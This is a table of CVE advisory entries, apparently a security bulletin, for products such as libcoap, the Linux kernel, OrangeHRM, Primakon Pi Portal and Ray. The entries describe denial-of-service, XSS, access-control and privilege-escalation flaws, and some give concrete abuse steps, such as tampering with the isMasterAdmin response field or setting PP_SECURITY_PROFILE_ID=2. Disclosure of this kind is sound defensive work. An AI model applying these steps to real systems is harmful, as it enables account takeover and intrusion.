| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65498 | https://github.com/obgm/libcoap/issues/1746 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | Array index error in tls_verify_call_back() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_ex_data_X509_STORE_CTX_idx() to return -1. | 2025-11-24 | not yet calculated | CVE-2025-65499 | https://github.com/obgm/libcoap/issues/1747 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | NULL pointer dereference in coap_dtls_generate_cookie() in src/coap_openssl.c in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a crafted DTLS handshake that triggers SSL_get_SSL_CTX() to return NULL. | 2025-11-24 | not yet calculated | CVE-2025-65500 | https://github.com/obgm/libcoap/issues/1746 https://github.com/obgm/libcoap/pull/1750 |
| libcoap--OISM | Null pointer dereference in coap_dtls_info_callback() in OISM libcoap 4.3.5 allows remote attackers to cause a denial of service via a DTLS handshake where SSL_get_app_data() returns NULL. | 2025-11-24 | not yet calculated | CVE-2025-65501 | https://github.com/obgm/libcoap/issues/1748 https://github.com/obgm/libcoap/pull/1750 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: fix refcount leak in nfsd_set_fh_dentry() nfsd exports a "pseudo root filesystem" which is used by NFSv4 to find the various exported filesystems using LOOKUP requests from a known root filehandle. NFSv3 uses the MOUNT protocol to find those exported filesystems and so is not given access to the pseudo root filesystem. If a v3 (or v2) client uses a filehandle from that filesystem, nfsd_set_fh_dentry() will report an error, but still stores the export in "struct svc_fh" even though it also drops the reference (exp_put()). This means that when fh_put() is called an extra reference will be dropped which can lead to use-after-free and possible denial of service. Normal NFS usage will not provide a pseudo-root filehandle to a v3 client. This bug can only be triggered by the client synthesising an incorrect filehandle. To fix this we move the assignments to the svc_fh later, after all possible error cases have been detected. | 2025-11-24 | not yet calculated | CVE-2025-40212 | https://git.kernel.org/stable/c/b6bc86ce3944b10b9fc181fc00c1a520a20ed965 https://git.kernel.org/stable/c/c83d7365cec5eb5ebeeee2a72e29b4ca58a7e4c2 https://git.kernel.org/stable/c/8a7348a9ed70bda1c1f51d3f1815bcbdf9f3b38c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: fix crash in set_mesh_sync and set_mesh_complete There is a BUG: KASAN: stack-out-of-bounds in set_mesh_sync due to memcpy from badly declared on-stack flexible array. Another crash is in set_mesh_complete() due to double list_del via mgmt_pending_valid + mgmt_pending_remove. Use DEFINE_FLEX to declare the flexible array right, and don't memcpy outside bounds. As mgmt_pending_valid removes the cmd from list, use mgmt_pending_free, and also report status on error. | 2025-11-24 | not yet calculated | CVE-2025-40213 | https://git.kernel.org/stable/c/5c19daa93d9af29f1f46251b47e1ea66bcc8d679 https://git.kernel.org/stable/c/1c9aca1787e8395a2c59fef20e914467958969c5 https://git.kernel.org/stable/c/e8785404de06a69d89dcdd1e9a0b6ea42dc6d327 |
| Logpoint--SIEM | An issue was discovered in Logpoint before 7.7.0. An improperly configured access control policy exposes sensitive Logpoint internal service (Redis) information to li-admin users. This can lead to privilege escalation. | 2025-11-27 | not yet calculated | CVE-2025-66360 | https://servicedesk.logpoint.com/hc/en-us/articles/29160917867549-Redis-communication-exposed-for-internal-communication |
| Logpoint--SIEM | An issue was discovered in Logpoint before 7.7.0. Sensitive information is exposed in System Processes for an extended period during high CPU load. | 2025-11-27 | not yet calculated | CVE-2025-66361 | https://servicedesk.logpoint.com/hc/en-us/articles/29160993806749-Process-Data-Exposure-Under-High-Load |
| lukevella--rallly | Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.6, an information disclosure vulnerability exposes participant details, including names and email addresses through the /api/trpc/polls.get,polls.participants.list endpoint, even when Pro privacy features are enabled. This bypasses intended privacy controls that should prevent participants from viewing other users' personal information. This issue has been patched in version 4.5.6. | 2025-11-29 | not yet calculated | CVE-2025-66027 | https://github.com/lukevella/rallly/security/advisories/GHSA-65wg-8xgw-f3fg https://github.com/lukevella/rallly/commit/59738c04f9a8ec25f0af5ce20ad0eab6cf134963 https://github.com/lukevella/rallly/releases/tag/v4.5.6 |
| Lumi Security Camera--Blurams | An issue in Blurams Lumi Security Camera (A31C) v23.1227.472.2926 allows local physical attackers to execute arbitrary code via overriding the bootloader on the SD card. | 2025-11-24 | not yet calculated | CVE-2025-63674 | http://blurams.com http://a31c.com https://vindivlabs.com/research/lumi_part_2/ |
| lunary-ai--lunary-ai/lunary | lunary-ai/lunary version 1.9.34 is vulnerable to an account takeover due to improper authentication in the Google OAuth integration. The application fails to verify the 'aud' (audience) field in the access token issued by Google, which is crucial for ensuring the token is intended for the application. This oversight allows attackers to use tokens issued to malicious applications to gain unauthorized access to user accounts. The issue is resolved in version 1.9.35. | 2025-11-25 | not yet calculated | CVE-2025-9803 | https://huntr.com/bounties/4734f35f-514c-4d10-98fa-3a54514f6af6 https://github.com/lunary-ai/lunary/commit/95a2cc8e012bf5f089edbfa072ba66dcb7e10d91 |
| Magewell Pro Convert--Magewell | A Cross-Site Request Forgery (CSRF) in the /mwapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request. | 2025-11-24 | not yet calculated | CVE-2025-63952 | https://www.magewell.com https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-63952 |
| Magewell Pro Convert--Magewell | A Cross-Site Request Forgery (CSRF) in the /usapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request. | 2025-11-24 | not yet calculated | CVE-2025-63953 | https://www.magewell.com https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-63953 |
| MegaTec Taiwan--ClientMate | The CMService.exe service runs with SYSTEM privileges and contains an unquoted service path. This allows a local attacker with write privileges to the filesystem to insert a malicious executable in the path, leading to privilege escalation. | 2025-11-26 | not yet calculated | CVE-2025-66264 | https://www.megatec.com.tw/software-download/ |
| MegaTec Taiwan--ClientMate | CMService.exe creates the C:\usr directory and subdirectories with insecure permissions, granting write access to all authenticated users. This allows attackers to replace configuration files (such as snmp.conf) or hijack DLLs to escalate privileges. | 2025-11-26 | not yet calculated | CVE-2025-66265 | https://www.megatec.com.tw/software-download/ |
| MegaTec Taiwan--UPSilon2000V6.0 | The RupsMon.exe service executable in UPSilon 2000 has insecure permissions, allowing the 'Everyone' group Full Control. A local attacker can replace the executable with a malicious binary to execute code with SYSTEM privileges, or simply change the service's configured path to a command and then start and stop the service to immediately achieve code execution and privilege escalation. | 2025-11-26 | not yet calculated | CVE-2025-66266 | https://www.megatec.com.tw/software-download/ |
| MegaTec Taiwan--UPSilon2000V6.0 | The RupsMon and USBMate services in UPSilon 2000 run with SYSTEM privileges and contain unquoted service paths. This allows a local attacker to perform path interception and escalate privileges if they have write permissions to any of the directories preceding the one in which the real service executables reside. | 2025-11-26 | not yet calculated | CVE-2025-66269 | https://www.megatec.com.tw/software-download/ |
| Millensys Vision Tools Workspace--MILLENSYS | MILLENSYS Vision Tools Workspace 6.5.0.2585 exposes a sensitive configuration endpoint (/MILLENSYS/settings) that is accessible without authentication. This page leaks plaintext database credentials, file share paths, internal license server configuration, and software update parameters. An unauthenticated attacker can retrieve this information by accessing the endpoint directly, potentially leading to full system compromise. The vulnerability is due to missing access controls on a privileged administrative function. | 2025-11-24 | not yet calculated | CVE-2025-63958 | https://www.millensys.com/ https://ozex.gitlab.io/tricks_hacks/2025-11-19-cve-2025-63958/index.html |
| Mongoose--Cesanta | Null pointer dereference in add_ca_certs() in Cesanta Mongoose before 7.2 allows remote attackers to cause a denial of service via TLS initialization where SSL_CTX_get_cert_store() returns NULL. | 2025-11-24 | not yet calculated | CVE-2025-65502 | https://github.com/cesanta/mongoose/issues/3306 https://github.com/cesanta/mongoose/pull/3307 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to version 0.22.5, a Heap-Use-After-Free (UAF) vulnerability exists in the TCP transport component of NanoMQ, which relies on the underlying NanoNNG library (specifically in src/sp/transport/mqtt/broker_tcp.c). The vulnerability is due to improper resource management and premature cleanup of message and pipe structures under specific malformed MQTTV5 retain message traffic conditions. This issue has been patched in version 0.22.5. | 2025-11-25 | not yet calculated | CVE-2025-65953 | https://github.com/nanomq/nanomq/security/advisories/GHSA-r95p-wjm8-2qxr |
| NCP Secure Enterprise--NCP | NCP Secure Enterprise Client 13.18 and NCP Secure Entry Windows Client 13.19 have an Untrusted Search Path vulnerability. | 2025-11-26 | not yet calculated | CVE-2025-26155 | https://pentest.axians.de/viewer.html?file=cve-2025-26155/CVE-axians-eng.pdf https://www.ncp-e.com/ |
| Netskope--Netskope Client | Netskope was notified about a potential gap in its agent (NS Client) on Windows systems. If this gap is successfully exploited, a local, authenticated user with Administrator privileges can improperly load the driver as a generic kernel service. This triggers the flaw, causing a system crash (Blue-Screen-of-Death) and resulting in a Denial of Service (DoS) for the affected machine. | 2025-11-28 | not yet calculated | CVE-2025-11156 | https://www.netskope.com/company/security-compliance-and-assurance/security-advisories-and-disclosures/netskope-security-advisory-nskpsa-2025-005 |
| OneUptime--oneuptime | OneUptime is a solution for monitoring and managing online services. In version 9.0.5598, a low-permission user can create new accounts through a direct API request instead of being restricted to the intended interface. This issue has been patched in version 9.1.0. | 2025-11-26 | not yet calculated | CVE-2025-65966 | https://github.com/OneUptime/oneuptime/security/advisories/GHSA-m449-vh5f-574g |
| OneUptime--oneuptime | OneUptime is a solution for monitoring and managing online services. Prior to version 8.0.5567, OneUptime is vulnerable to privilege escalation via Login Response Manipulation. During the login process, the server response included a parameter called isMasterAdmin. By intercepting and modifying this parameter value from false to true, it is possible to gain access to the admin dashboard interface. However, an attacker may be unable to view or interact with the data if they still do not have sufficient permissions. This issue has been patched in version 8.0.5567. | 2025-11-26 | not yet calculated | CVE-2025-66028 | https://github.com/OneUptime/oneuptime/security/advisories/GHSA-675q-66gf-gqg8 https://github.com/OneUptime/oneuptime/commit/3e72b2a9a4f50f98cf1f6cf13fa3e405715bb370 |
| Online Shopping Portal--PHPGurukul | Insecure Direct Object Reference (IDOR) in the Track order function in PHPGURUKUL Online Shopping Portal 2.1 allows information disclosure via the oid parameter. | 2025-11-25 | not yet calculated | CVE-2025-65647 | https://phpgurukul.com/ https://github.com/SachuuZ/CVE/tree/main/CVE-2025-65647 |
| Open-Source HashTech--HashTech Project | An unauthenticated administrative access vulnerability exists in the open-source HashTech project (https://github.com/henzljw/hashtech) 1.0 through commit 5919decaff2681dc250e934814fc3a35f6093ee5 (2021-07-02). Due to missing authentication checks on /admin_index.php, an attacker can directly access the admin dashboard without valid credentials. This allows full administrative control, including viewing/modifying user accounts, managing orders, changing payments, and editing product listings. Successful exploitation can lead to information disclosure, data manipulation, and privilege escalation. | 2025-11-26 | not yet calculated | CVE-2025-65276 | https://gist.github.com/whoisrushi/c3bfcd1adf96d80952edbd03d0310836 |
| OpenAtlas v.8.12.0--Austrian Academy of Sciences | An issue in Austrian Academy of Sciences (AW) Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages. | 2025-11-24 | not yet calculated | CVE-2025-56423 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-user-enumeration/ |
| OpenAtlas--Austrian Archaeological Institute | Incorrect access control in Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to access sensitive information via sending a crafted GET request to the /display_logo endpoint. | 2025-11-24 | not yet calculated | CVE-2025-60914 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-unautorisierter-zugriff-display_logo/ |
| OpenAtlas--Austrian Archaeological Institute | An issue in the size query parameter (/views/file.py) of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute a path traversal via a crafted request. | 2025-11-24 | not yet calculated | CVE-2025-60915 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-lfi-konfigurationsdatei-exfiltration/ |
| OpenAtlas--Austrian Archaeological Institute | A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the charge parameter. | 2025-11-24 | not yet calculated | CVE-2025-60916 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-reflected-dom-based-xss-charge/ |
| OpenAtlas--Austrian Archaeological Institute | A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter. | 2025-11-24 | not yet calculated | CVE-2025-60917 | https://www.sec4you-pentest.com/schwachstellen/ https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-xss-in-farb-feldern-ort/ |
| openbao--openbao | OpenBao is an open source identity-based secrets management system. Prior to version 2.4.4, a privileged operator could use the identity group subsystem to add a root policy to an identity group, escalating their own or another user's permissions in the system. Specifically, this is an issue when an operator in the root namespace has access to the identity/groups endpoints but does not have policy access. Otherwise, an operator with policy access could create or modify an existing policy to grant root-equivalent permissions through the sudo capability. This issue has been patched in version 2.4.4. | 2025-11-25 | not yet calculated | CVE-2025-64761 | https://github.com/openbao/openbao/security/advisories/GHSA-7ff4-jw48-3436 https://github.com/openbao/openbao/pull/2143 https://github.com/openbao/openbao/commit/16bb0ccd37a502930a289d434cbe4e7b4edd66e5 |
| openobserve--openobserve | OpenObserve is a cloud-native observability platform. Prior to version 0.16.0, organization invitation tokens do not expire once issued, remain valid even after the invited user is removed from the organization, and allow multiple invitations to the same email with different roles where all issued links remain valid simultaneously. This results in broken access control where a removed or demoted user can regain access or escalate privileges. This issue has been patched in version 0.16.0. | 2025-11-29 | not yet calculated | CVE-2025-66223 | https://github.com/openobserve/openobserve/security/advisories/GHSA-c856-2xpx-gw75 |
| OpenSearch--OpenSearch | A vulnerability in OpenSearch allows attackers to cause Denial of Service (DoS) by submitting complex query_string inputs. This issue affects all OpenSearch versions below 3.2.0. | 2025-11-25 | not yet calculated | CVE-2025-9624 | https://fluidattacks.com/advisories/chick https://opensearch.org/blog/explore-opensearch-3-3/ |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the application contains an input-neutralization flaw in its mail configuration and delivery workflow that allows user-controlled values to flow directly into the system's sendmail command. Because these values are not sanitized or constrained before being incorporated into the command execution path, certain sendmail behaviors can be unintentionally invoked during email processing. This makes it possible for the application to write files on the server as part of the mail-handling routine, and in deployments where those files end up in web-accessible locations, the behavior can be leveraged to achieve execution of attacker-controlled content. The issue stems entirely from constructing OS-level command strings using unsanitized input within the mail-sending logic. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66224 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-2w7w-h5wv-xr55 |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the password reset workflow does not enforce that the username submitted in the final reset request matches the account for which the reset process was originally initiated. After obtaining a valid reset link for any account they can receive email for, an attacker can alter the username parameter in the final reset request to target a different user. Because the system accepts the supplied username without verification, the attacker can set a new password for any chosen account, including privileged accounts, resulting in full account takeover. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66225 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-5ghw-9775-v263 |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the application does not invalidate existing sessions when a user is disabled or when a password change occurs, allowing active session cookies to remain valid indefinitely. As a result, a disabled user, or an attacker using a compromised account, can continue to access protected pages and perform operations as long as a prior session remains active. Because the server performs no session revocation or session-store cleanup during these critical state changes, disabling an account or updating credentials has no effect on already-established sessions. This makes administrative disable actions ineffective and allows unauthorized users to retain full access even after an account is closed or a password is reset, exposing the system to prolonged unauthorized use and significantly increasing the impact of account takeover scenarios. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66289 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-99qp-xh4q-pr9x |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the application's recruitment attachment retrieval endpoint does not enforce the required authorization checks before serving candidate files. Even users restricted to ESS-level access, who have no permission to view the Recruitment module, can directly access candidate attachment URLs. When an authenticated request is made to the attachment endpoint, the system validates the session but does not confirm that the requesting user has the necessary recruitment permissions. As a result, any authenticated user can download CVs and other uploaded documents for arbitrary candidates by issuing direct requests to the attachment endpoint, leading to unauthorized exposure of sensitive applicant data. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66290 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-qf8r-c54j-jw88 |
| orangehrm--orangehrm | OrangeHRM is a comprehensive human resource management (HRM) system. From version 5.0 to 5.7, the interview attachment retrieval endpoint in the Recruitment module serves files based solely on an authenticated session and user-supplied identifiers, without verifying whether the requester has permission to access the associated interview record. Because the server does not perform any recruitment-level authorization checks, an ESS-level user with no access to recruitment workflows can directly request interview attachment URLs and receive the corresponding files. This exposes confidential interview documents (including candidate CVs, evaluations, and supporting files) to unauthorized users. The issue arises from relying on predictable object identifiers and session presence rather than validating the user's association with the relevant recruitment process. This issue has been patched in version 5.8. | 2025-11-29 | not yet calculated | CVE-2025-66291 | https://github.com/orangehrm/orangehrm/security/advisories/GHSA-v32g-r8xx-4g6g https://github.com/orangehrm/orangehrm/commit/647133d0fdda989a4836845a6531277078a84607 |
| Otsuka Information Technology--FMS | FMS developed by Otsuka Information Technology has a Reflected Cross-site Scripting vulnerability, allowing unauthenticated remote attackers to execute arbitrary JavaScript code in the user's browser through phishing attacks. | 2025-11-24 | not yet calculated | CVE-2025-13589 | https://www.twcert.org.tw/tw/cp-132-10520-03f29-1.html https://www.twcert.org.tw/en/cp-139-10521-abdc1-2.html |
| Overhang.io--Overhang.io | An issue was discovered in Overhang.IO (tutor-open-edx) (overhangio/tutor) 20.0.2 allowing local unauthorized attackers to gain access to sensitive information due to the absence of proper cache-control HTTP headers and client-side session checks. | 2025-11-26 | not yet calculated | CVE-2025-65681 | https://github.com/overhangio/tutor https://docs.tutor.edly.io https://github.com/Rivek619/CVE-2025-65681 |
| OWASP--java-html-sanitizer | OWASP Java HTML Sanitizer is a configurable HTML sanitizer written in Java, allowing inclusion of HTML authored by third parties in web applications while protecting against XSS. In version 20240325.1, OWASP Java HTML Sanitizer is vulnerable to XSS if HtmlPolicyBuilder allows noscript and style tags with allowTextIn inside the style tag. This could lead to XSS if the payload is crafted in such a way that the CSS is not sanitised and tags not mentioned in the HTML policy are allowed through. At time of publication no known patch is available. | 2025-11-26 | not yet calculated | CVE-2025-66021 | https://github.com/OWASP/java-html-sanitizer/security/advisories/GHSA-g9gq-3pfx-2gw2 |
| pallets--werkzeug | Werkzeug is a comprehensive WSGI web application library. Prior to version 3.1.4, Werkzeug's safe_join function allows path segments with Windows device names. On Windows, there are special device names such as CON, AUX, etc that are implicitly present and readable in every directory. send_from_directory uses safe_join to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely. This issue has been patched in version 3.1.4. | 2025-11-29 | not yet calculated | CVE-2025-66221 | https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2 https://github.com/pallets/werkzeug/commit/4b833376a45c323a189cd11d2362bcffdb1c0c13 https://github.com/pallets/werkzeug/releases/tag/3.1.4 |
| pretix--pretix | Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name} is used in an email template, it will be replaced with the buyer's name for the final email. If the name of the attendee contained HTML or Markdown formatting, this was rendered as HTML in the resulting email. This way, a user could inject links or other formatted text through a maliciously formatted name. Since pretix applies a strict allow list approach to allowed HTML tags, this could not be abused for XSS or similarly dangerous attack chains. However, it can be used to manipulate emails in a way that makes user-provided content appear in a trustworthy and credible way, which can be abused for phishing. | 2025-11-27 | not yet calculated | CVE-2025-13742 | https://pretix.eu/about/en/blog/20251126-release-2025-9-1/ |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 /api/v2/users endpoint is vulnerable to unauthorized data exposure due to deficient access control mechanisms. Any authenticated user, regardless of their privilege level (including standard or low-privileged users), can make a GET request to this endpoint and retrieve a complete, unfiltered list of all registered application users. Crucially, the API response body for this endpoint includes password hashes. | 2025-11-25 | not yet calculated | CVE-2025-64061 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64061.md |
| Primakon Pi Portal--Primakon | The Primakon Pi Portal 1.0.18 /api/V2/pp_users?email endpoint is used for user data filtering but lacks proper server-side validation against the authenticated session. By manipulating the email parameter to an arbitrary value (e.g., otheruser@user.com), an attacker can assume the session and gain full access to the target user's data and privileges. Also, if the email parameter is left blank, the application defaults to the first user in the list, who is typically the application administrator, resulting in an immediate Privilege Escalation to the highest level. | 2025-11-25 | not yet calculated | CVE-2025-64062 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64062.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: unauthorized account modification, modifying/deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint; confidential data access, accessing and downloading sensitive organizational documents via a direct request to the document retrieval API; and privilege escalation by manipulating core system functions. This vulnerability can lead to complete compromise of data integrity and confidentiality. | 2025-11-25 | not yet calculated | CVE-2025-64063 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64063.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 /api/v2/pp_users endpoint fails to adequately check user permissions before processing a PATCH request to modify the PP_SECURITY_PROFILE_ID. Because of weak access controls any low level user can use this API and change their permission to Administrator by using PP_SECURITY_PROFILE_ID=2 inside body of request and escalate privileges. | 2025-11-25 | not yet calculated | CVE-2025-64064 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64064.md |
| Primakon Pi Portal--Primakon | The Primakon Pi Portal 1.0.18 API /api/V2/pp_udfv_admin endpoint fails to perform necessary server-side validation. The administrative LoginAs or user impersonation feature is vulnerable to an access control failure. This flaw allows any authenticated low-privileged user to execute a direct PATCH request, enabling them to impersonate any other arbitrary user, including application Administrators. This is due to a Broken Function Level Authorization failure (the function doesn't check the caller's privilege) compounded by an Insecure Design that permits a session switch without requiring the target user's password or an administrative token and only needs the email of the user. | 2025-11-25 | not yet calculated | CVE-2025-64065 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64065.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 REST /api/v2/user/register endpoint suffers from a Broken Access Control vulnerability. The endpoint fails to implement any authorization checks, allowing unauthenticated attackers to perform POST requests to register new user accounts in the application's local database. This bypasses the intended security architecture, which relies on an external Identity Provider for initial user registration and assumes that internal user creation is an administrative-only function. This vector can also be chained with other vulnerabilities for privilege escalation and complete compromise of application. This specific request can be used to also enumerate already registered user accounts, aiding in social engineering or further targeted attacks. | 2025-11-25 | not yet calculated | CVE-2025-64066 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64066.md |
| Primakon Pi Portal--Primakon | Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways: Direct ID manipulation and IDOR, by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user; and filter Omission, by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information. | 2025-11-25 | not yet calculated | CVE-2025-64067 | https://www.primakon.com/rjesenja/primakon-pcm/ https://github.com/n3k7ar91/Vulnerabilites/blob/main/Primakon/CVE-2025-64067.md |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to version 6.4.0, an attacker who uses this vulnerability can craft a PDF which leads to a memory usage of up to 1 GB per stream. This requires parsing the content stream of a page using the LZWDecode filter. This issue has been patched in version 6.4.0. | 2025-11-25 | not yet calculated | CVE-2025-66019 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-m449-cwjh-6pw7 https://github.com/py-pdf/pypdf/commit/96186725e5e6f237129a58a97cd19204a9ce40b2 https://github.com/py-pdf/pypdf/releases/tag/6.4.0 |
| RapidCMS--OpenRapid | OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /user/user-move.php. | 2025-11-24 | not yet calculated | CVE-2025-64047 | http://rapidcms.com https://gist.github.com/b1uel0n3/b105ad05dbcd3fe148a26e8180dddda7 |
| ray-project--ray | Ray is an AI compute engine. Prior to version 2.52.0, developers working with Ray as a development tool can be exploited via a critical RCE vulnerability exploitable via Firefox and Safari. This vulnerability is due to an insufficient guard against browser-based attacks, as the current defense uses the User-Agent header starting with the string "Mozilla" as a defense mechanism. This defense is insufficient as the fetch specification allows the User-Agent header to be modified. Combined with a DNS rebinding attack against the browser, this vulnerability is exploitable against a developer running Ray who inadvertently visits a malicious website, or is served a malicious advertisement (malvertising). This issue has been patched in version 2.52.0. | 2025-11-26 | not yet calculated | CVE-2025-62593 | https://github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09 |
| REDAXO CMS--REDAXO | A stored cross-site scripting (XSS) vulnerability in the module management component in REDAXO CMS 5.20.0 allows remote users to inject arbitrary web script or HTML via the Output code field in modules. The payload is executed when a user views or edits an article by adding slice that uses the compromised module. | 2025-11-25 | not yet calculated | CVE-2025-64049 | https://github.com/redaxo/redaxo https://drive.google.com/drive/folders/1SpwL548ZBRYU_uL8W7Riv7VHshr2UN0R?usp=sharing https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-64049.md |
| REDAXO CMS--REDAXO | A Remote Code Execution (RCE) vulnerability in the template management component in REDAXO CMS 5.20.0 allows remote authenticated administrators to execute arbitrary operating system commands by injecting PHP code into an active template. The payload is executed when visitors access frontend pages using the compromised template. | 2025-11-25 | not yet calculated | CVE-2025-64050 | https://github.com/redaxo/redaxo https://drive.google.com/drive/folders/1Via4r4wn5zCcBllWmHpxYweCPgcbN0bz?usp=sharing https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-64050.md |
| RSA--RSA | In RSA Authentication Agent before 7.4.7, service paths and shortcut paths may be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended executable. | 2025-11-24 | not yet calculated | CVE-2024-47856 | https://community.rsa.com/s/product-download/a9G4u000000mCOYEAU/rsa-authentication-agent-747-for-microsoft-windows https://community.rsa.com/s/article/RSA-2024-13-RSA-Authentication-Agent-for-Microsoft-Windows-Security-Update |
| Ruckus Unleashed--Ruckus Networks | A reflected Cross-site scripting (XSS) vulnerability in Ruckus Unleashed 200.13.6.1.319 via the name parameter to the captive-portal endpoint selfguestpass/guestAccessSubmit.jsp. | 2025-11-25 | not yet calculated | CVE-2025-63735 | https://www.ruckusnetworks.com/products/network-control-and-management/controller-less/ https://github.com/huthx/CVE-2025-63735-Ruckus-Unleashed-Reflected-XSS |
| Ruoyi--Ruoyi | Ruoyi v4.8.0 is vulnerable to Incorrect Access Control. There is a missing checkUserDataScope permission check in the resetPwd method of SysUserController.java. | 2025-11-26 | not yet calculated | CVE-2025-46174 | https://gitee.com/y_project/RuoYi/issues/IC1JZR https://gitee.com/y_project/RuoYi/commit/ea4af7a8cf54393b11d3d286e0aaeb3df8a9aaef https://gist.github.com/Han-tj/29543ce0dae8cbb3bcbedca3390844a9 |
| Ruoyi--Ruoyi | Ruoyi v4.8.0 is vulnerable to Incorrect Access Control. There is a missing checkUserDataScope permission check in the authRole method of SysUserController.java. | 2025-11-26 | not yet calculated | CVE-2025-46175 | https://gitee.com/y_project/RuoYi/issues/IC1FS0 https://gitee.com/y_project/RuoYi/commit/f935b2782f4237cdbcc13bdce76703e82c42f4fe https://gist.github.com/Han-tj/74d2ed84ede1909da55090fed410d288 |
| Ruoyi--Ruoyi | An issue was discovered in Ruoyi 4.8.1 allowing attackers to gain escalated privileges due to the owning department having higher rights than the active user. | 2025-11-26 | not yet calculated | CVE-2025-56396 | https://gitee.com/y_project/RuoYi/issues/ICJ865 https://gist.github.com/Han-tj/22cfd18fa9f116bb886e8e56782f6865 |
